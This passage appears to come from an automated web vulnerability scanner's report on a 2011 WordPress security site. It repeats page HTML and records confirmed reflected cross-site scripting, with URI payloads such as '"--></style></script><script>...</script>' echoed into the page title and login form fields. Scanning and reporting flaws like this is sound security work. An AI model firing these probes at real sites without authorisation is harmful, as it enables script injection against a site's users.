menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-content/themes/atahualpa/js/\'\"--></style></script><script>netsparker(0x000471)</script>/?_login=dd278283e0"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-content/themes/atahualpa/js/\'\"--></style></script><script>netsparker(0x000471)</script>/?_login=430f6f3114" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is a..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-content Themes Atahualpa Js '"-->< Style>< Script><script>netsparker(0x000471)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-content/themes/atahualpa/js/\'\"--></style></script><script>netsparker(0x000471)</script>/?_login=dd278283e0"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-content/themes/atahualpa/js/\'\"--></style></script><script>netsparker(0x000471)</script>/?_login=430f6f3114" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is a..
|
- /wp-includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000428)%3C/script%3E
/wp-includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000428)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x000428)</script> |
Request
GET /wp-includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000428)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-includes '"-->< Style>< Script><script>netsparker(0x000428)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
